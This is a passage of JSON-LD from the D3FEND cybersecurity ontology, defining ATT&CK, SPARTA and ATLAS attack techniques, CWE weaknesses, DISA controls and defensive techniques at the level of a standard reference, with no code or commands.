      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N9497b9e23b064c2f897630814a6b06d0"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:N9497b9e23b064c2f897630814a6b06d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0105"
      }
    },
    {
      "@id": "d3f:CWE-30",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-30",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\dir\\..\\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '\\dir\\..\\filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:T1012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:attack-id": "T1012",
      "d3f:definition": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.",
      "d3f:may-invoke": {
        "@id": "d3f:GetSystemConfigValue"
      },
      "rdfs:label": "Query Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N2e1289987e4c49fdbf33d5255bcc763f"
        },
        {
          "@id": "_:N0b0fd424bfb448d8822d5952a2d2a2e9"
        }
      ]
    },
    {
      "@id": "_:N2e1289987e4c49fdbf33d5255bcc763f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:N0b0fd424bfb448d8822d5952a2d2a2e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemConfigValue"
      }
    },
    {
      "@id": "d3f:CWE-44",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-44",
      "d3f:definition": "The product accepts path input in the form of internal dot ('file.ordir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'file.name' (Internal Dot)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:CWE-391",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-391",
      "d3f:definition": "[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.",
      "rdfs:label": "Unchecked Error Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-754"
      }
    },
    {
      "@id": "d3f:EncryptedTunnels",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EncryptedTunnels"
      ],
      "d3f:d3fend-id": "D3-ET",
      "d3f:definition": "Encrypted encapsulation of routable network traffic.",
      "d3f:isolates": {
        "@id": "d3f:IntranetNetwork"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurityArchitectureForTheInternetProtocol"
      },
      "rdfs:label": "Encrypted Tunnels",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:Nbc7a4efe6e8b491a855dedad1fae4f97"
        }
      ]
    },
    {
      "@id": "_:Nbc7a4efe6e8b491a855dedad1fae4f97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetwork"
      }
    },
    {
      "@id": "d3f:T1055.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:attack-id": "T1055.001",
      "d3f:definition": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Dynamic-link Library Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Ne3cea6bf394c447c9e4f79c30a144237"
        },
        {
          "@id": "_:N7274d7a6bea149498cbf5181b628b99b"
        },
        {
          "@id": "_:N966c05be8d2e46d6a576e8ff9f8094d8"
        }
      ]
    },
    {
      "@id": "_:Ne3cea6bf394c447c9e4f79c30a144237",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N7274d7a6bea149498cbf5181b628b99b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "_:N966c05be8d2e46d6a576e8ff9f8094d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:Reference-RFC2289-AOne-TimePasswordSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc2289"
      },
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:kb-reference-title": "A One-Time Password System",
      "rdfs:label": "Reference - RFC 2289 - A One-Time Password System"
    },
    {
      "@id": "d3f:OSAPITerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:invokes": {
        "@id": "d3f:TerminateProcess"
      },
      "rdfs:label": "OS API Terminate Process",
      "rdfs:seeAlso": "An OS API function taht stops the execution of a process.",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N0f8892c4211e48c9947c2896735361de"
        }
      ]
    },
    {
      "@id": "_:N0f8892c4211e48c9947c2896735361de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TerminateProcess"
      }
    },
    {
      "@id": "d3f:Directory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a directory is a file system cataloging structure which contains references to other computer files, and possibly other directories. On many computers, directories are known as folders, or drawers to provide some relevancy to a workbench or the traditional office file cabinet.",
      "d3f:may-contain": {
        "@id": "d3f:File"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Directory_(computing)"
      },
      "rdfs:label": "Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nb00ffcf7ac1e42e896d3a836a4464d53"
        }
      ]
    },
    {
      "@id": "_:Nb00ffcf7ac1e42e896d3a836a4464d53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:ProcessEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessEviction"
      ],
      "d3f:d3fend-id": "D3-PE",
      "d3f:definition": "Process eviction techniques terminate or remove running process.",
      "d3f:enables": {
        "@id": "d3f:Evict"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MalwareDetectionUsingLocalComputationalModels_CrowdstrikeInc"
      },
      "rdfs:label": "Process Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nb3432cf7fda74997a05bf53208da42fe"
        }
      ]
    },
    {
      "@id": "_:Nb3432cf7fda74997a05bf53208da42fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Evict"
      }
    },
    {
      "@id": "d3f:CCI-002749_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system audits the use of the manual override capability.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002749"
    },
    {
      "@id": "d3f:HarmonicMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HM",
      "d3f:definition": "The reciprocal of the arithmetic mean of the reciprocals of the data values. This measure too is valid only for data that are measured absolutely on a strictly positive scale.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Harmonic Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:OutboundInternetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet network traffic is network traffic on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000186_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, enforces authorized access to the corresponding private key.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000186"
    },
    {
      "@id": "d3f:NetworkConnectionCloseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection is closed.",
      "rdfs:label": "Network Connection Close Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionEvent"
        },
        {
          "@id": "_:Nffe08595eba24aa9a5ddc82d71870350"
        }
      ]
    },
    {
      "@id": "_:Nffe08595eba24aa9a5ddc82d71870350",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:EX-0014.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0014.02",
      "d3f:definition": "Here the adversary forges messages on internal command/data paths (e.g., 1553, SpaceWire, CAN, custom). By emitting frames with valid identifiers, addresses, and timing, the attacker can make subscribers accept actuator setpoints, power switch toggles, mode changes, or housekeeping values that originated off-path. Because many consumers act on “latest value wins” or on message cadence, forged traffic can mask real publishers, starve critical topics, or force handlers to execute unintended branches. Gateways that translate between networks amplify impact: a spoofed message on one side can propagate to multiple domains as legitimate payload. Outcomes include misdelivered commands, silent configuration drift, and control loops chasing phantom stimuli, all while bus monitors show protocol-conformant traffic.",
      "d3f:produces": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "d3f:spoofs": {
        "@id": "d3f:BusMessage"
      },
      "d3f:uses": {
        "@id": "d3f:BusNetworkNode"
      },
      "rdfs:label": "Bus Traffic Spoofing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0014"
        },
        {
          "@id": "_:N2b356625db22468589a8e0bc02fe5df8"
        },
        {
          "@id": "_:N037d614a66a24892a1f39dd1b58bea51"
        },
        {
          "@id": "_:Nc1d5e98ee0204346a5815b4c310b1851"
        }
      ],
      "skos:prefLabel": "Bus Traffic Spoofing"
    },
    {
      "@id": "_:N2b356625db22468589a8e0bc02fe5df8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "_:N037d614a66a24892a1f39dd1b58bea51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusMessage"
      }
    },
    {
      "@id": "_:Nc1d5e98ee0204346a5815b4c310b1851",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkNode"
      }
    },
    {
      "@id": "d3f:SPARTALateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0007"
      },
      "rdfs:label": "Lateral Movement Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N5300fbdae7f1448eaa1a8ed4b071463d"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:N5300fbdae7f1448eaa1a8ed4b071463d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0007"
      }
    },
    {
      "@id": "d3f:OutboundNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound traffic is network traffic originating from a host of interest (client), to another host (server).",
      "rdfs:label": "Outbound Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1132",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1132",
      "d3f:definition": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Data Encoding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N640f743b6e0140d38bc2b599b39cb42f"
        }
      ]
    },
    {
      "@id": "_:N640f743b6e0140d38bc2b599b39cb42f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:OTControlVariable",
      "@type": "owl:Class",
      "d3f:definition": "A control variable is the measurement of the physical condition of the device that influences the Process Variables.",
      "rdfs:isDefinedBy": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en",
      "rdfs:label": "OT Control Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:OTLogicVariable"
      },
      "skos:example": "If the Set Point of a temperature control system for a residential dwelling is 72 degrees, and the Process Variable is 82 degrees, the Control Variable for the air conditioner should be 'on.'"
    },
    {
      "@id": "d3f:CCI-000831_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "d3f:ProcessEviction"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements a configurable capability to automatically disable the information system if organization-defined security violations are detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000831"
    },
    {
      "@id": "d3f:Real-timeOperatingSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A real-time operating system (RTOS) is an operating system (OS) for real-time computing applications that processes data and events that have critically defined time constraints.",
      "d3f:synonym": "RTOS",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Real-time_operating_system"
      },
      "rdfs:label": "Real-time operating system",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystem"
      }
    },
    {
      "@id": "d3f:T1189",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1189",
      "d3f:definition": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).",
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:produces": [
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Drive-by Compromise",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N3b750423495b4305a02b4befe988df1c"
        },
        {
          "@id": "_:Nfcf18e7e47df4f00be739f7cee2939d3"
        },
        {
          "@id": "_:N932ca9ef6e9649b69a6c61df166857d2"
        }
      ]
    },
    {
      "@id": "_:N3b750423495b4305a02b4befe988df1c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:Nfcf18e7e47df4f00be739f7cee2939d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "_:N932ca9ef6e9649b69a6c61df166857d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:Reference-ProtectingAgainstDistributedDenialOfServiceAttacks-CiscoTechnologyInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7171683B2"
      },
      "d3f:kb-abstract": "A method for authenticating packet communication traffic includes receiving a data packet sent over a network from a source address to a destination address and reading from the packet a value of a field that is indicative of a number of hops traversed by the packet since having been sent from the source address. The authenticity of the source address is assessed responsive to the value.",
      "d3f:kb-author": "Guy Pazi, Anat Bremler-Bar, Rami Rivlin, Dan Touitou",
      "d3f:kb-organization": "Cisco Technologies Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Protecting against distributed denial of service attacks",
      "rdfs:label": "Reference - Protecting against distributed denial of service attacks - Cisco Technology Inc."
    },
    {
      "@id": "d3f:CCI-001589_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization incorporates detection of unauthorized, security-relevant configuration changes into the organization’s incident response capability to ensure they are tracked.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001589"
    },
    {
      "@id": "d3f:User",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user is a person [or agent] who uses a computer or network service. Users generally use a system or a software product without the technical expertise required to fully understand it. Power users use advanced features of programs, though they are not necessarily capable of computer programming and system administration. A user often has a user account and is identified to the system by a username (or user name). Other terms for username include login name, screenname (or screen name), nickname (or nick) and handle, which is derived from the identical Citizen's Band radio term. Some software products provide services to other systems and have no direct end users.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_(computing)"
      },
      "rdfs:label": "User",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:UserAccount"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/10761247-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Agent"
        },
        {
          "@id": "_:N1d6fb463c9ec4f07b20cb1e1643f9049"
        },
        {
          "@id": "_:Na2b5c6b8e96b49bf8dc0f3526c980ad5"
        }
      ]
    },
    {
      "@id": "_:N1d6fb463c9ec4f07b20cb1e1643f9049",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-account"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:Na2b5c6b8e96b49bf8dc0f3526c980ad5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricted-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlList"
      }
    },
    {
      "@id": "d3f:CWE-462",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-462",
      "d3f:definition": "Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error.",
      "rdfs:label": "Duplicate Key in Associative List (Alist)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-694"
      }
    },
    {
      "@id": "d3f:T0814",
      "@type": "owl:Class",
      "d3f:attack-id": "T0814",
      "d3f:definition": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment.",
      "rdfs:label": "Denial of Service - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Denial of Service"
    },
    {
      "@id": "d3f:T1546.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.007",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "d3f:produces": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Netsh Helper DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Naa3caf414b56460384568f1f90ed57eb"
        },
        {
          "@id": "_:N8e37bd888adb4450b5097a5716e4c6a9"
        }
      ]
    },
    {
      "@id": "_:Naa3caf414b56460384568f1f90ed57eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "_:N8e37bd888adb4450b5097a5716e4c6a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-642",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-642",
      "d3f:definition": "The product stores security-critical state information about its users, or the product itself, in a location that is accessible to unauthorized actors.",
      "rdfs:label": "External Control of Critical State Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:AML.T0079",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0079",
      "d3f:definition": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](/techniques/AML.T0017)) or obtained ([Obtain Capabilities](/techniques/AML.T0016)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](/techniques/AML.T0008)) or was otherwise compromised by them. Capabilities may also be staged on web services, such as GitHub, model registries, such as Hugging Face, or container registries.\n\nAdversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019), malicious models ([Publish Poisoned Models](/techniques/AML.T0058), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).",
      "rdfs:label": "Stage Capabilities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0079"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Stage Capabilities"
    },
    {
      "@id": "d3f:CCI-001619_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of special characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001619"
    },
    {
      "@id": "d3f:CWE-297",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-297",
      "d3f:definition": "The product communicates with a host that provides a certificate, but the product does not properly ensure that the certificate is actually associated with that host.",
      "rdfs:label": "Improper Validation of Certificate with Host Mismatch",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForDetectingMalwareInjectedIntoMemoryOfAComputingDevice_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190018958A1/en?oq=US20190018958-A1"
      },
      "d3f:kb-abstract": "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in memory of a computing device. The malicious code detection module examines the call stack for each thread running within the operating system of the computing device. Within each call stack, the malicious code detection module identifies the originating module for each stack frame and determines whether the originating module is backed by an image on disk. If an originating module is not backed by an image on disk, the thread containing that originating module is flagged as potentially malicious, execution of the thread optionally is suspended, and an alert is generated for the user or administrator.",
      "d3f:kb-author": "Joseph W. Desimone",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "System and method for detecting malware injected into memory of a computing device",
      "rdfs:label": "Reference - System and method for detecting malware injected into memory of a computing device - Endgame Inc"
    },
    {
      "@id": "d3f:EX-0015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0015",
      "d3f:definition": "Adversaries extract secrets or steer execution by observing or perturbing physical byproducts of computation rather than the intended interfaces. Passive channels include timing, power draw, electromagnetic emissions, acoustic/optical leakage, and thermal patterns correlated with operations such as key use, counter updates, or parser activity. Active channels deliberately induce faults during runtime, e.g., voltage or clock glitches, electromagnetic/laser injection, or targeted radiation, to flip bits, skip checks, or bias intermediate values. On spacecraft, prime targets include crypto modules, SDR/FPGA pipelines, bootloaders, and bus controllers whose switching behavior or error handling reveals protocol state or key material. With sufficient samples, or with repeated fault attempts, statistical features emerge that reduce entropy of the sensitive variable under study; in effect, a successful fault campaign turns into information leakage comparable to a passive side channel. Collection vantage points range from on-orbit proximity (for EM/optical), to ATLO and ground test (for direct probing), to instrumented compromised hardware already in the signal path.",
      "d3f:modifies": {
        "@id": "d3f:OTEmbeddedComputer"
      },
      "rdfs:label": "Side-Channel Attack - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0015/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N94916333e302411db945b098583967aa"
        }
      ],
      "skos:prefLabel": "Side-Channel Attack"
    },
    {
      "@id": "_:N94916333e302411db945b098583967aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEmbeddedComputer"
      }
    },
    {
      "@id": "d3f:ResourceDevelopmentTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to establish resources they can use to support operations.",
      "d3f:enables": {
        "@id": "d3f:TA0042"
      },
      "rdfs:label": "Resource Development Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
